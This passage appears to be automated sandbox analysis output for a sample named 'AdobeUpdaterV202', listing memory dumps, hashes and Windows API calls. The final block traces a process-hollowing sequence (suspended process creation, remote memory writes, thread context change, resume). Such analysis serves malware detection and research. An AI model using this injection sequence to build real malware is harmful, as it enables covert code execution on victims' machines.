                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
                                  • Instruction ID: 1d5a5a7442404c01dcb086e8b468368d98cd509a68ecbbac4890636fd9e720fc
                                  • Opcode Fuzzy Hash: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
                                  • Instruction Fuzzy Hash: 21216231604205AF9F20EF61AE8197FB7EAEF453687109514F925B7152E770EC50A760
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 00EA4FAE
                                    • Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA4FE6
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA5006
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 158306478-0
                                  • Opcode ID: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
                                  • Instruction ID: fccb7507101f296c6a4d6a636527276f6ff1960b8d7486d5ce9c2838a1e76f99
                                  • Opcode Fuzzy Hash: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
                                  • Instruction Fuzzy Hash: FD11C4B66066157FAA2127765CCACBF6DECDF9F3947102424F502B9101EA64FE0045B1
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000), ref: 00EA93EC
                                  • GetLastError.KERNEL32(?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000,?,00EA0512,00000000), ref: 00EA93F8
                                    • Part of subcall function 00EA93BE: CloseHandle.KERNEL32(FFFFFFFE,00EA9408,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000), ref: 00EA93CE
                                  • ___initconout.LIBCMT ref: 00EA9408
                                    • Part of subcall function 00EA9380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EA93AF,00EA81BE,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA9393
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA941D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
                                  • Instruction ID: 205d96b35783901114113a6298e81ec997b869b9955be43ace55178f2a52dea1
                                  • Opcode Fuzzy Hash: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
                                  • Instruction Fuzzy Hash: 43F0303A401118BFCF221FA5DC049CD3F6BFF4E3A0F005010FA19A9171C632A921EB90
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0C1D
                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,00EA0966,00000001,00000000,00E931FD,00000000,?,?,00000000,?,?,00EA0DE9), ref: 00EA0CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: f
                                  • API String ID: 1834446548-3647721633
                                  • Opcode ID: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
                                  • Instruction ID: 1f7687a8e49b74ca09466d5bac686fd3fa3f0823db06cc0705bb0b342e3bf1fe
                                  • Opcode Fuzzy Hash: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
                                  • Instruction Fuzzy Hash: 8241E072A00258AFCF25CF68CC80BE9B7B5AB4D314F1491E9E549BA141D7B1FE81DB50
                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?), ref: 00E97FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
                                  • Instruction ID: 6855c075d9a98adde1903ddad8be4f0de9cf324f9d42bb410bdaf18de300698e
                                  • Opcode Fuzzy Hash: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
                                  • Instruction Fuzzy Hash: 3641A972A00209AFDF26CF98CD85AEEBBB1FF49304F189059F904B7261D735A994CB50
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D,?,00E95C62), ref: 00E989A5
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00E989AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: b\
                                  • API String ID: 3013587201-3493366257
                                  • Opcode ID: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
                                  • Instruction ID: 6808e52866b697250f53339f403fb3b5fead245f00947071f3569649fd7f0312
                                  • Opcode Fuzzy Hash: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
                                  • Instruction Fuzzy Hash: 1B11B135600115AFCF22CF64DD809B973A4FB8B3647142159EA0AF7220DF31ED01DB92

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_005D018D

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005D02FC
                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005D030F
                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 005D032D
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005D0351
                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 005D037C
                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 005D03D4
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 005D041F
                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005D045D
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 005D0499
                                  • ResumeThread.KERNELBASE(?), ref: 005D04A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.2362489227.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_5d0000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                  • String ID: GetP$Load$aryA$ress
                                  • API String ID: 2687962208-977067982
                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction ID: f88b47602620910211152d09fab249978a5430b87debc69aa841de4be348c33c
                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction Fuzzy Hash: A2B1E57664024AAFDB60CFA8CC80BDA77A5FF88714F158525EA0CEB341D774FA418B94